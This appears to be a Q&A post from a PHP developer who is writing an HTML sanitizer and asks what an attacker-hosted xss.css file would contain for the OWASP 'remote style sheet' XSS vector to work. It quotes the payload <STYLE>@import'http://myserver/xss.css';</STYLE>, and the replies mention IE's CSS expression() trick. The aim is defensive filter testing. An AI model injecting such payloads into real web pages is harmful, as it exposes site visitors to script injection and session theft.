# Remote style sheet attack vector - xss

Tags: php, xss

I'm trying to create a sanitize function, It's almost done, there is one attack which bothers me (from https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet_part_2 ):

*Remote style sheet part 2
This works the same as above, but uses a STYLE tag instead of a LINK tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end /STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:
`<STYLE>@import'http://myserver/xss.css';</STYLE>`*

The question is what am I supposed to put in the xss.css file for it to work? I tried alert('xss'), then `<script>alert('xss')</script>`, neither works.

Comment: Did you research which browser/versions are open to this attack? For example in some old IE browers you can use expression(XSS HERE) inside the CSS and there are other cases as well. The question is too broad imo.

Comment: Thanks. Well, Yes, I found somewhere that it works in IE8, on the other hand expressions were abondoned in this version and we don't support IE7, so if expressions are the only thing the attacker can do in a css file, then it's fine, I'll move to other possible attacks. Thanks again!

Comment: There are more, read the part under the one you refered in the question there are more, also take a look at https://code.google.com/p/browsersec/wiki/Part1 near the bottom (actully third table from bottom) you got a tabel that is pretty useful